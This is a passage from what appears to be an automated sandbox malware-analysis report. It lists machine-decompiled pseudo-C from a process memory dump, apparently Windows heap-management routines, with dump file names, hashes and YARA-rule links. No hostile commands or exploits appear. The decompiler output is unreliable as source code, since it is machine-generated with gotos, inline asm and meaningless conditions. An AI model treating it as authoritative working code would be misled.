							_t105 =  *(__ecx + 0x50) ^ _t182;
							_v12 = _t105;
							_t107 = _v12;
							_t146 = _t105 >> 0x00000010 ^ _t105 >> 0x00000008 ^ _t107;
							if(_t107 >> 0x18 != _t146) {
								_push(_t146);
								E1E46A80D(__ecx, _v20, 0, 0);
								_t149 = _v8;
							}
							_t182 = _v12;
							_t127 = _a4;
						}
						_t171 = _t158 - (_t182 & 0x0000ffff);
					}
					if(_t171 <= 0) {
						_t71 =  *_t111;
						if(_t127 == 0) {
							_t173 = _t158 -  *((intOrPtr*)(_t71 + 0x14));
						} else {
							_t180 =  *(_t71 - 8);
							_v20 = _t71 + 0xfffffff8;
							if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
								_t97 =  *(_t149 + 0x50) ^ _t180;
								_v12 = _t97;
								_t99 = _v12;
								_t141 = _t97 >> 0x00000010 ^ _t97 >> 0x00000008 ^ _t99;
								if(_t99 >> 0x18 != _t141) {
									_push(_t141);
									E1E46A80D(_t149, _v20, 0, 0);
									_t149 = _v8;
								}
								_t180 = _v12;
								_t127 = _a4;
							}
							_t173 = _t158 - (_t180 & 0x0000ffff);
						}
						if(_t173 <= 0) {
							return  *_t111;
						} else {
							_t175 = _v24;
							if( *_t175 != 0 || _a8 !=  *((intOrPtr*)(_t175 + 4)) - 1) {
								_t128 = _v16;
								_t73 =  *((intOrPtr*)(_t175 + 0x1c));
								_t151 = _t128 >> 5;
								_t164 = ( *((intOrPtr*)(_t175 + 4)) -  *((intOrPtr*)(_t175 + 0x14)) >> 5) - 1;
								_t118 =  !((1 << (_t128 & 0x0000001f)) - 1) &  *(_t73 + _t151 * 4);
								_t74 = _t73 + _t151 * 4;
								if(1 == 0) {
									while(_t151 <= _t164) {
										_t118 =  *(_t74 + 4);
										_t74 = _t74 + 4;
										_t151 = _t151 + 1;
										if(_t118 == 0) {
											continue;
										} else {
											goto L28;
										}
										goto L51;
									}
									if(_t118 != 0) {
										goto L28;
									} else {
										goto L40;
									}
								} else {
									L28:
									if(_t118 == 0) {
										_t77 = _t118 >> 0x00000010 & 0x000000ff;
										if(_t77 != 0) {
											_t79 = ( *(_t77 + 0x1e3884d0) & 0x000000ff) + 0x10;
										} else {
											_t57 = (_t118 >> 0x18) + 0x1e3884d0; // 0x10008
											_t79 = ( *_t57 & 0x000000ff) + 0x18;
										}
									} else {
										_t82 = _t118 & 0x000000ff;
										if(_t118 == 0) {
											_t79 = ( *((_t118 >> 0x00000008 & 0x000000ff) + 0x1e3884d0) & 0x000000ff) + 8;
										} else {
											_t79 =  *(_t82 + 0x1e3884d0) & 0x000000ff;
										}
									}
									_t153 = (_t151 << 5) + _t79;
									if( *((intOrPtr*)(_t175 + 8)) != 0) {
										_t153 = _t153 + _t153;
									}
									_t70 =  *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x20)) + _t153 * 4));
									L8:
									return _t70;
								}
							} else {
								_t88 = _v16;
								if( *((intOrPtr*)(_t175 + 8)) != 0) {
									_t88 = _t88 + _t88;
								}
								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x20)) + _t88 * 4));
								if(_t111 == _t178) {
									L40:
									return 0;
								} else {
									do {
										if(_t127 == 0) {
											_t131 = _t158 -  *((intOrPtr*)(_t178 + 0x14));
										} else {
											_t167 =  *(_t178 - 8);
											_t123 = _t178 - 8;
											if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
												_t155 =  *(_t149 + 0x50) ^ _t167;
												_t167 = _t155;
												_t136 = _t155 >> 0x00000010 ^ _t155 >> 0x00000008 ^ _t155;
												_t149 = _v8;
												if(_t155 >> 0x18 != _t136) {
													_push(_t136);
													E1E46A80D(_t149, _t123, 0, 0);
													_t149 = _v8;
												}
											}
											_t111 = _v28;
											_t158 = _a12;
											_t131 = _t158 - (_t167 & 0x0000ffff);
										}
										if(_t131 <= 0) {
											return _t178;
										} else {
											goto L24;
										}
										goto L51;
										L24:
										_t178 =  *_t178;
										_t127 = _a4;
									} while (_t111 != _t178);
									goto L40;
								}
							}
						}
					} else {
						goto L7;
					}
				}
				L51:
			}

0x1e3cab4a
0x1e3cab51
0x1e3cab57
0x1e3cab5b
0x1e3cab5e
0x1e3cab61
0x1e3cab64
0x1e3cab67
0x1e3cab6c
0x1e3cabbb
0x1e3cabbb
0x00000000
0x1e3cab6e
0x1e3cab6e
0x1e3cab73
0x1e3cad70
0x1e3cab79
0x1e3cab79
0x1e3cab83
0x1e3cab86
0x1e3cab8b
0x1e3cab8f
0x1e3cab9a
0x1e3cab9d
0x1e3caba4
0x1e41242c
0x1e412439
0x1e41243e
0x1e41243e
0x1e3cabaa
0x1e3cabad
0x1e3cabad
0x1e3cabb5
0x1e3cabb5
0x1e3cabb9
0x1e3cabc6
0x1e3cabca
0x1e3cad7a
0x1e3cabd0
0x1e3cabd0
0x1e3cabda
0x1e3cabdd
0x1e3cabe2
0x1e3cabe6
0x1e3cabf1
0x1e3cabf4
0x1e3cabfb
0x1e412446
0x1e412453
0x1e412458
0x1e412458
0x1e3cac01
0x1e3cac04
0x1e3cac04
0x1e3cac0c
0x1e3cac0c
0x1e3cac10
0x1e3cad6b
0x1e3cac16
0x1e3cac16
0x1e3cac1c
0x1e3caca7
0x1e3cacba
0x1e3cacbd
0x1e3cacc8
0x1e3cacc9
0x1e3caccc
0x1e3caccf
0x1e3cad00
0x1e3cad04
0x1e3cad07
0x1e3cad0a
0x1e3cad0d
0x00000000
0x1e3cad0f
0x00000000
0x1e3cad0f
0x00000000
0x1e3cad0d
0x1e3cad40
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3cacd1
0x1e3cacd1
0x1e3cacd4
0x1e3cad16
0x1e3cad1b
0x1e3cad54
0x1e3cad1d
0x1e3cad20
0x1e3cad27
0x1e3cad27
0x1e3cacd6
0x1e3cacd6
0x1e3cacdb
0x1e3cad39
0x1e3cacdd
0x1e3cacdd
0x1e3cacdd
0x1e3cacdb
0x1e3cace7
0x1e3caced
0x1e41247f
0x1e41247f
0x1e3cacf6
0x1e3cabbd
0x1e3cabc3
0x1e3cabc3
0x1e3cac2b
0x1e3cac2f
0x1e3cac32
0x1e412460
0x1e412460
0x1e3cac3b
0x1e3cac40
0x1e3cad42
0x1e3cad4a
0x1e3cac46
0x1e3cac46
0x1e3cac48
0x1e3cad5b
0x1e3cac4e
0x1e3cac4e
0x1e3cac51
0x1e3cac58
0x1e3cac5d
0x1e3cac66
0x1e3cac6d
0x1e3cac74
0x1e3cac77
0x1e412467
0x1e412472
0x1e412477
0x1e412477
0x1e3cac77
0x1e3cac7d
0x1e3cac83
0x1e3cac88
0x1e3cac88
0x1e3cac8c
0x1e3caca4
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3cac8e
0x1e3cac8e
0x1e3cac90
0x1e3cac93
0x00000000
0x1e3cac46
0x1e3cac40
0x1e3cac1c
0x00000000
0x00000000
0x00000000
0x1e3cabb9
0x00000000

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7a7078d530c80ee0c1a36c2b4fc700830d9f9a38253d260b9957211b3e47b5c
Instruction ID: 426c28c31b7504aff524b44dc377a276660a9a32a355eb8abdce65ace9722575
Opcode Fuzzy Hash: b7a7078d530c80ee0c1a36c2b4fc700830d9f9a38253d260b9957211b3e47b5c
Instruction Fuzzy Hash: 9F81D772A0025A8BDB14CE59C4A4B6AB7F2EF84315F15835BD942EF345D630FD46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E4725DD, Relevance: .2, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E1E4725DD(signed int __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, signed int _a12, char* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				signed int _t74;
				signed int _t77;
				signed int _t80;
				signed int _t82;
				signed int _t102;
				signed int _t117;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				intOrPtr _t135;
				void* _t154;
				signed int _t160;
				signed int _t168;
				unsigned int _t175;
				signed int _t185;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t193;
				signed int _t194;
				unsigned int _t200;
				unsigned int _t201;
				signed char _t202;
				signed int _t204;
				signed int _t210;
				intOrPtr _t211;
				signed int _t212;

				_t133 = _a4;
				_v24 = __edx;
				_v16 = __ecx;
				E1E472E3F(__ecx, __edx, __eflags, _t133);
				_t204 = _a8;
				_t187 = 0x10;
				_t210 = (( *_t133 ^  *0x1e496110 ^ _t133) >> 0x00000001 & 0x00007fff) - _t204;
				if(_t210 != 0 && ( *(_v16 + 0x38) & 0x00000001) != 0) {
					_t185 = (_t133 + _t204 * 0x00000008 + 0x00000fff & 0xfffff000) - _t133 + _t204 * 8 >> 3;
					_t132 = _t185 << 3;
					if(_t132 >= _t187) {
						if(__eflags != 0) {
							__eflags = _t132 - 0x20;
							if(_t132 < 0x20) {
								_t204 = _t204 + 1;
								_t210 = _t210 - 1;
								__eflags = _t210;
							}
						}
					} else {
						_t204 = _t204 + _t185;
						_t210 = _t210 - _t185;
					}
				}
				if(_t210 << 3 < _t187) {
					_t204 = _t204 + _t210;
				}
				_t74 =  *0x1e496110; // 0x18e1e984
				asm("sbb edx, edx");
				_t189 =  !_t187 & _t210;
				_t211 = _v24;
				_v20 = _t189;
				 *_t133 = ( !_t74 ^  *_t133 ^ _t133) & 0x7fffffff ^  !_t74 ^ _t133;
				_t152 = _t133 - _t211;
				_t77 = _t133 - _t211 >> 0xc;
				_v28 = _t77;
				_t80 = (_t77 ^  *0x1e496110 ^ _t133) & 0x000000ff;
				_v32 = _t80;
				 *(_t133 + 4) = _t80;
				_t82 = _t204 << 3;
				if(_t189 != 0) {
					_t82 = _t82 + 0x10;
				}
				_t190 = _t189 | 0xffffffff;
				_t154 = 0x3f;
				_v12 = E1E3ED340(_t82 + _t152 - 0x00000001 >> 0x0000000c | 0xffffffff, _t154 - (_t82 + _t152 - 1 >> 0xc), _t190);
				_v8 = _t190;
				_t191 = _t190 | 0xffffffff;
				_v12 = _v12 & E1E3ED0F0(_t86 | 0xffffffff, _v28, _t191);
				_v8 = _v8 & _t191;
				_t193 = _v12 & ( *(_t211 + 8) ^ _v12);
				_t212 = _v20;
				_t160 = _v8 & ( *(_t211 + 0xc) ^ _v8);
				_v12 = _t193;
				_v8 = _t160;
				if((_t193 | _t160) != 0) {
					 *(_t133 + 4) = _v32 | 0x00000200;
					_t117 = _a12 & 0x00000001;
					_v32 = _t117;
					if(_t117 == 0) {
						E1E3BFFB0(_t133, _t204, _v16);
						_t193 = _v12;
					}
					_t212 = _v20;
					_t200 =  !_v8;
					_t121 = _t200 & 0x000000ff;
					_t201 = _t200 >> 8;
					_t44 = _t121 + 0x1e38ac00; // 0x6070708
					_t122 = _t201 & 0x000000ff;
					_t202 = _t201 >> 8;
					_t175 = _t202 >> 8;
					_t45 = _t122 + 0x1e38ac00; // 0x6070708
					_t123 = _t202 & 0x000000ff;
					_t47 = _t175 + 0x1e38ac00; // 0x6060706
					_t48 = _t123 + 0x1e38ac00; // 0x6070708
					_t142 = _v16;
					if(E1E472FBD(_v16, _v24, _v12, _v8, ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff) + ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff), 1) < 0) {
						_t212 = _t212 + _t204;
						_t204 = 0;
					}
					if(_v32 == 0) {
						E1E3C2280(_t125, _t142);
					}
					_t133 = _a4;
					 *_a16 = 0xff;
					 *(_t133 + 4) =  *(_t133 + 4) & 0xfffffdff;
				}
				 *_t133 =  *_t133 ^ (_t204 + _t204 ^  *_t133 ^  *0x1e496110 ^ _t133) & 0x0000fffe;
				if(_t212 != 0) {
					_t194 = _t133 + _t204 * 8;
					_t134 =  *0x1e496110; // 0x18e1e984
					if(_t204 == 0) {
						_t102 = ( *_t194 ^ _t134 ^ _t194) & 0x7fff0000;
						__eflags = _t102;
					} else {
						_t102 = _t204 << 0x10;
					}
					_t135 = _v24;
					 *_t194 = ((_t212 & 0x00007fff | 0xc0000000) + (_t212 & 0x00007fff | 0xc0000000) | _t102) ^ _t134 ^ _t194;
					_t168 = _t194 + _t212 * 8;
					 *(_t194 + 4) = (_t194 - _t135 >> 0x0000000c ^  *0x1e496110 ^ _t194) & 0x000000ff;
					if(_t168 < _t135 + (( *(_t135 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t168 =  *_t168 ^ (_t212 << 0x00000010 ^  *_t168 ^  *0x1e496110 ^ _t168) & 0x7fff0000;
					}
					E1E47241A(_v16, _t135, _t194, _a12, _a16);
				}
				return _t204;
			}

0x1e4725e6
0x1e4725f6
0x1e4725fb
0x1e4725fe
0x1e472603
0x1e472610
0x1e472611
0x1e472613
0x1e47262f
0x1e472634
0x1e472639
0x1e472641
0x1e472643
0x1e472646
0x1e472648
0x1e472649
0x1e472649
0x1e472649
0x1e472646
0x1e47263b
0x1e47263b
0x1e47263d
0x1e47263d
0x1e472639
0x1e472651
0x1e472653
0x1e472655
0x1e472657
0x1e47265c
0x1e472668
0x1e47266a
0x1e472675
0x1e47267c
0x1e472680
0x1e472684
0x1e472687
0x1e472692
0x1e472695
0x1e472698
0x1e47269d
0x1e4726a2
0x1e4726a4
0x1e4726a4
0x1e4726a8
0x1e4726b2
0x1e4726c0
0x1e4726c6
0x1e4726c9
0x1e4726d1
0x1e4726d4
0x1e4726e2
0x1e4726ea
0x1e4726ed
0x1e4726f1
0x1e4726f6
0x1e4726f9
0x1e472707
0x1e47270d
0x1e472710
0x1e472713
0x1e472718
0x1e47271d
0x1e47271d
0x1e472722
0x1e472750
0x1e472758
0x1e47275d
0x1e472760
0x1e472766
0x1e472769
0x1e47276e
0x1e472771
0x1e472777
0x1e47277d
0x1e472783
0x1e472791
0x1e4727a7
0x1e4727a9
0x1e4727ab
0x1e4727ab
0x1e4727b1
0x1e4727b4
0x1e4727b4
0x1e4727bc
0x1e4727bf
0x1e4727c2
0x1e4727c2
0x1e4727db
0x1e4727df
0x1e4727e5
0x1e4727e8
0x1e4727f0
0x1e4727ff
0x1e4727ff
0x1e4727f2
0x1e4727f4
0x1e4727f4
0x1e47281a
0x1e472824
0x1e472826
0x1e472834
0x1e472843
0x1e472858
0x1e472858
0x1e472866
0x1e472866
0x1e472873

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c07936d7ee3767c36355623f780667e76330a97823e6939fa71b6004a1cbaa8
Instruction ID: a3862295c8f5c5cd67d601b31262c568cd502809159bc4a36c801e70d6387ab5
Opcode Fuzzy Hash: 7c07936d7ee3767c36355623f780667e76330a97823e6939fa71b6004a1cbaa8
Instruction Fuzzy Hash: 3E81C372E101159BCB08CF79C8916BEB7F1FF88211B1686AAD851EB395DA34E901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E471D55, Relevance: .2, Instructions: 226
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E1E471D55(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t97;
				signed int _t101;
				signed int _t112;
				unsigned int _t113;
				signed int _t121;
				signed int _t128;
				signed int _t130;
				signed char _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t149;
				signed int _t150;
				void* _t154;
				signed int* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				intOrPtr _t171;
				signed int _t172;
				void* _t175;
				signed int* _t178;
				signed int _t179;
				signed int _t180;
				signed char _t181;
				signed char _t183;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				void* _t191;
				void* _t197;

				_t137 = __ecx;
				_push(0x64);
				_push(0x1e481070);
				E1E3FD08C(__ebx, __edi, __esi);
				 *(_t191 - 0x24) = __edx;
				 *((intOrPtr*)(_t191 - 0x20)) = __ecx;
				 *((intOrPtr*)(_t191 - 0x38)) = __ecx;
				_t135 = 0;
				 *(_t191 - 0x40) = 0;
				_t171 =  *((intOrPtr*)(__ecx + 0xc));
				_t189 =  *(__ecx + 8);
				 *(_t191 - 0x28) = _t189;
				 *((intOrPtr*)(_t191 - 0x3c)) = _t171;
				 *(_t191 - 0x50) = _t189;
				_t187 = __edx << 0xf;
				 *(_t191 - 0x4c) = _t187;
				_t190 = 0x8000;
				 *(_t191 - 0x34) = 0x8000;
				_t172 = _t171 - _t187;
				if(_t172 <= 0x8000) {
					_t190 = _t172;
					 *(_t191 - 0x34) = _t172;
				}
				 *(_t191 - 0x68) = _t135;
				 *(_t191 - 0x64) = _t135;
				L3:
				while(1) {
					if( *(_t191 + 8) != 0) {
						L22:
						 *(_t191 + 8) = _t135;
						E1E47337F(_t137, 1, _t191 - 0x74);
						_t97 =  *((intOrPtr*)(_t191 - 0x20));
						_t175 =  *(_t97 + 0x14);
						 *(_t191 - 0x58) = _t175;
						_t139 = _t97 + 0x14;
						 *(_t191 - 0x44) = _t139;
						_t197 = _t175 - 0xffffffff;
						if(_t197 == 0) {
							 *_t139 =  *(_t191 - 0x24);
							E1E4733B6(_t191 - 0x74);
							 *(_t191 - 0x40) = 1;
							_t60 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t101 =  *_t60;
							_t141 =  *(_t191 - 0x24);
							asm("bt [eax], ecx");
							_t103 = (_t101 & 0xffffff00 | __eflags > 0x00000000) & 0x000000ff;
							if(__eflags == 0) {
								goto L41;
							} else {
								_t103 = _t187 - 1 + _t190;
								__eflags = _t187 - 1 + _t190 -  *((intOrPtr*)(_t191 - 0x3c));
								if(_t187 - 1 + _t190 >=  *((intOrPtr*)(_t191 - 0x3c))) {
									goto L41;
								} else {
									__eflags = _t190 - 1;
									if(__eflags > 0) {
										_t143 =  *(_t191 - 0x28);
										_t178 = _t143 + (_t187 >> 5) * 4;
										_t144 = _t143 + (_t187 - 1 + _t190 >> 5) * 4;
										 *(_t191 - 0x50) = _t144;
										_t112 =  *_t178;
										 *(_t191 - 0x54) = _t112;
										_t113 = _t112 | 0xffffffff;
										__eflags = _t178 - _t144;
										if(_t178 != _t144) {
											_t103 = _t113 << _t187;
											__eflags =  *_t178 & _t103;
											if(( *_t178 & _t103) != 0) {
												goto L41;
											} else {
												_t103 =  *(_t191 - 0x50);
												while(1) {
													_t178 =  &(_t178[1]);
													__eflags = _t178 - _t103;
													if(_t178 == _t103) {
														break;
													}
													__eflags =  *_t178 - _t135;
													if( *_t178 != _t135) {
														goto L41;
													} else {
														continue;
													}
													goto L42;
												}
												_t103 = (_t103 | 0xffffffff) >>  !(_t187 - 1 + _t190);
												__eflags = _t103;
												_t149 =  *_t178;
												goto L38;
											}
										} else {
											_t154 = 0x20;
											_t103 = _t113 >> _t154 - _t190 << _t187;
											_t149 =  *(_t191 - 0x54);
											L38:
											_t150 = _t149 & _t103;
											__eflags = _t150;
											asm("sbb cl, cl");
											_t135 =  ~_t150 + 1;
											_t141 =  *(_t191 - 0x24);
											goto L39;
										}
									} else {
										if(__eflags != 0) {
											goto L41;
										} else {
											_t103 =  *(_t191 - 0x28);
											asm("bt [eax], edi");
											if(__eflags >= 0) {
												L40:
												_t136 =  *((intOrPtr*)(_t191 - 0x20));
												asm("lock btr [eax], ecx");
												 *((intOrPtr*)(_t191 - 0x60)) = (_t141 << 0xc) +  *((intOrPtr*)(_t136 + 8));
												 *((intOrPtr*)(_t191 - 0x5c)) = 0x1000;
												_push(0x4000);
												_push(_t191 - 0x5c);
												_push(_t191 - 0x60);
												_push(0xffffffff);
												_t103 = E1E3E96E0();
											} else {
												L39:
												__eflags = _t135;
												if(_t135 == 0) {
													goto L41;
												} else {
													goto L40;
												}
											}
										}
									}
								}
							}
						} else {
							E1E4733B6(_t191 - 0x74);
							_t172 = _t191 - 0x58;
							E1E3DE18B( *(_t191 - 0x44), _t172, 4, _t135,  *0x1e495880);
							_t51 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t121 =  *_t51;
							asm("bt [eax], ecx");
							_t103 = (_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff;
							if(((_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff) == 0) {
								goto L41;
							} else {
								_t137 =  *((intOrPtr*)(_t191 - 0x20));
								continue;
							}
						}
					} else {
						 *(_t191 - 4) = _t135;
						_t103 = _t187 - 1 + _t190;
						 *(_t191 - 0x30) = _t103;
						if(_t103 <  *((intOrPtr*)(_t191 - 0x3c))) {
							__eflags = _t190 - 1;
							if(__eflags > 0) {
								_t179 =  *(_t191 - 0x28);
								_t161 = _t179 + (_t187 >> 5) * 4;
								 *(_t191 - 0x2c) = _t161;
								_t128 = _t179 + ( *(_t191 - 0x30) >> 5) * 4;
								 *(_t191 - 0x44) = _t128;
								_t180 =  *_t161;
								__eflags = _t161 - _t128;
								if(_t161 != _t128) {
									_t103 = (_t128 | 0xffffffff) << _t187;
									__eflags = _t103 & _t180;
									if((_t103 & _t180) != 0) {
										goto L5;
									} else {
										_t130 =  *(_t191 - 0x2c);
										_t164 =  *(_t191 - 0x44);
										while(1) {
											_t130 = _t130 + 4;
											 *(_t191 - 0x2c) = _t130;
											_t180 =  *_t130;
											__eflags = _t130 - _t164;
											if(_t130 == _t164) {
												break;
											}
											__eflags = _t180;
											if(_t180 == 0) {
												continue;
											} else {
												goto L5;
											}
											goto L19;
										}
										_t103 = (_t130 | 0xffffffff) >>  !( *(_t191 - 0x30));
										__eflags = _t103;
										goto L17;
									}
								} else {
									_t167 = 0x20;
									_t103 = (_t128 | 0xffffffff) >> _t167 - _t190 << _t187;
									L17:
									_t183 =  ~(_t180 & _t103);
									asm("sbb dl, dl");
									goto L18;
								}
							} else {
								if(__eflags != 0) {
									goto L5;
								} else {
									_t103 =  *(_t191 - 0x28);
									asm("bt [eax], edi");
									_t183 =  ~(_t172 & 0xffffff00 | __eflags > 0x00000000);
									asm("sbb dl, dl");
									L18:
									_t181 = _t183 + 1;
									__eflags = _t181;
								}
							}
						} else {
							L5:
							_t181 = _t135;
						}
						L19:
						 *(_t191 - 0x19) = _t181;
						_t163 = _t181 & 0x000000ff;
						 *(_t191 - 0x48) = _t163;
						 *(_t191 - 4) = 0xfffffffe;
						if(_t163 == 0) {
							L41:
							_t136 =  *((intOrPtr*)(_t191 - 0x20));
						} else {
							_t137 =  *((intOrPtr*)(_t191 - 0x20));
							goto L22;
						}
					}
					L42:
					__eflags =  *(_t191 - 0x40);
					if( *(_t191 - 0x40) != 0) {
						_t91 = _t136 + 0x14; // 0x14
						_t142 = _t91;
						 *_t91 = 0xffffffff;
						__eflags = 0;
						asm("lock or [eax], edx");
						_t103 = E1E3DDFDF(_t91, 1, _t142);
					}
					return E1E3FD0D1(_t103);
				}
			}

0x1e471d55
0x1e471d55
0x1e471d57
0x1e471d5c
0x1e471d63
0x1e471d66
0x1e471d69
0x1e471d6c
0x1e471d6e
0x1e471d71
0x1e471d74
0x1e471d77
0x1e471d7a
0x1e471d7d
0x1e471d82
0x1e471d85
0x1e471d88
0x1e471d8d
0x1e471d90
0x1e471d94
0x1e471d96
0x1e471d98
0x1e471d98
0x1e471d9b
0x1e471d9e
0x00000000
0x1e471da1
0x1e471da5
0x1e471e78
0x1e471e78
0x1e471e82
0x1e471e87
0x1e471e8a
0x1e471e8d
0x1e471e92
0x1e471e95
0x1e471e98
0x1e471e9b
0x1e471ede
0x1e471ee3
0x1e471ee8
0x1e471ef2
0x1e471ef2
0x1e471ef5
0x1e471ef8
0x1e471efe
0x1e471f03
0x00000000
0x1e471f09
0x1e471f0c
0x1e471f0e
0x1e471f11
0x00000000
0x1e471f17
0x1e471f17
0x1e471f1a
0x1e471f31
0x1e471f34
0x1e471f3f
0x1e471f42
0x1e471f45
0x1e471f47
0x1e471f4a
0x1e471f4d
0x1e471f4f
0x1e471f63
0x1e471f65
0x1e471f67
0x00000000
0x1e471f69
0x1e471f69
0x1e471f72
0x1e471f72
0x1e471f75
0x1e471f77
0x00000000
0x00000000
0x1e471f6e
0x1e471f70
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1e471f70
0x1e471f83
0x1e471f83
0x1e471f85
0x00000000
0x1e471f85
0x1e471f51
0x1e471f53
0x1e471f5a
0x1e471f5c
0x1e471f87
0x1e471f87
0x1e471f87
0x1e471f8b
0x1e471f8d
0x1e471f90
0x00000000
0x1e471f90
0x1e471f1c
0x1e471f1c
0x00000000
0x1e471f22
0x1e471f22
0x1e471f25
0x1e471f28
0x1e471f97
0x1e471f97
0x1e471f9d
0x1e471fa7
0x1e471faa
0x1e471fb1
0x1e471fb9
0x1e471fbd
0x1e471fbe
0x1e471fc0
0x1e471f2a
0x1e471f93
0x1e471f93
0x1e471f95
0x00000000
0x00000000
0x00000000
0x00000000
0x1e471f95
0x1e471f28
0x1e471f1c
0x1e471f1a
0x1e471f11
0x1e471e9d
0x1e471ea0
0x1e471eae
0x1e471eb4
0x1e471ebc
0x1e471ebc
0x1e471ec2
0x1e471ec8
0x1e471ecd
0x00000000
0x1e471ed3
0x1e471ed3
0x00000000
0x1e471ed3
0x1e471ecd
0x1e471dab
0x1e471dab
0x1e471db1
0x1e471db3
0x1e471db9
0x1e471dbf
0x1e471dc2
0x1e471dda
0x1e471ddd
0x1e471de0
0x1e471de9
0x1e471dec
0x1e471def
0x1e471df1
0x1e471df3
0x1e471e0a
0x1e471e0c
0x1e471e0e
0x00000000
0x1e471e10
0x1e471e10
0x1e471e13
0x1e471e16
0x1e471e16
0x1e471e19
0x1e471e1c
0x1e471e1e
0x1e471e20
0x00000000
0x00000000
0x1e471e22
0x1e471e24
0x00000000
0x1e471e26
0x00000000
0x1e471e26
0x00000000
0x1e471e24
0x1e471e30
0x1e471e30
0x00000000
0x1e471e30
0x1e471df5
0x1e471df7
0x1e471e01
0x1e471e32
0x1e471e34
0x1e471e36
0x00000000
0x1e471e36
0x1e471dc4
0x1e471dc4
0x00000000
0x1e471dc6
0x1e471dc6
0x1e471dc9
0x1e471dcf
0x1e471dd1
0x1e471e38
0x1e471e38
0x1e471e38
0x1e471e38
0x1e471dc4
0x1e471dbb
0x1e471dbb
0x1e471dbb
0x1e471dbb
0x1e471e3a
0x1e471e3a
0x1e471e3d
0x1e471e40
0x1e471e43
0x1e471e6f
0x1e471fc7
0x1e471fc7
0x1e471e75
0x1e471e75
0x00000000
0x1e471e75
0x1e471e6f
0x1e471fca
0x1e471fca
0x1e471fce
0x1e471fd0
0x1e471fd0
0x1e471fd3
0x1e471fd9
0x1e471fde
0x1e471fe4
0x1e471fe4
0x1e471fee
0x1e471fee

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d171fcee72b4c63508baba17af840fe0ba1a22118bc2bea95ed4e8bb6a1206ce
Instruction ID: 7fb750c4c9091f84531e326bb53b5614921b848db16c385013b262d1adb4b2f1
Opcode Fuzzy Hash: d171fcee72b4c63508baba17af840fe0ba1a22118bc2bea95ed4e8bb6a1206ce
Instruction Fuzzy Hash: 19814C75E102598FDB08CFA9C8909ECB7F3BF49354B14436AE415AB394DB31A94ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 1E4603DA, Relevance: .2, Instructions: 218
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E1E4603DA(signed int* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				signed char _v28;
				signed int _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				intOrPtr* _t80;
				signed int _t87;
				signed char _t90;
				signed int _t107;
				intOrPtr* _t119;
				signed int _t120;
				signed int _t121;
				signed char _t127;
				void* _t129;
				intOrPtr* _t130;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t144;
				signed char _t148;
				signed int _t154;
				signed char _t155;
				signed int _t164;
				unsigned int _t167;
				signed int _t168;
				signed int _t170;
				unsigned int _t173;
				signed int* _t174;
				signed int _t175;
				intOrPtr* _t177;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				signed char _t183;
				intOrPtr _t184;
				unsigned int _t186;
				unsigned int _t187;

				_push( *0x1e49634c);
				_t119 = __ecx;
				_t184 = __edx;
				_push( *0x1e496348);
				_v20 = __ecx;
				_push(0);
				_t129 = 0xc;
				_t80 = E1E46BBBB(_t129, _t129);
				_t130 = _t80;
				_v16 = _t130;
				if(_t130 == 0) {
					return _t80;
				}
				 *((intOrPtr*)(_t130 + 8)) = _a4;
				_t82 =  &(__ecx[1]);
				 *((intOrPtr*)(_t130 + 4)) = _t184;
				_v36 =  &(__ecx[1]);
				E1E3C2280( &(__ecx[1]), _t82);
				_v12 = 1;
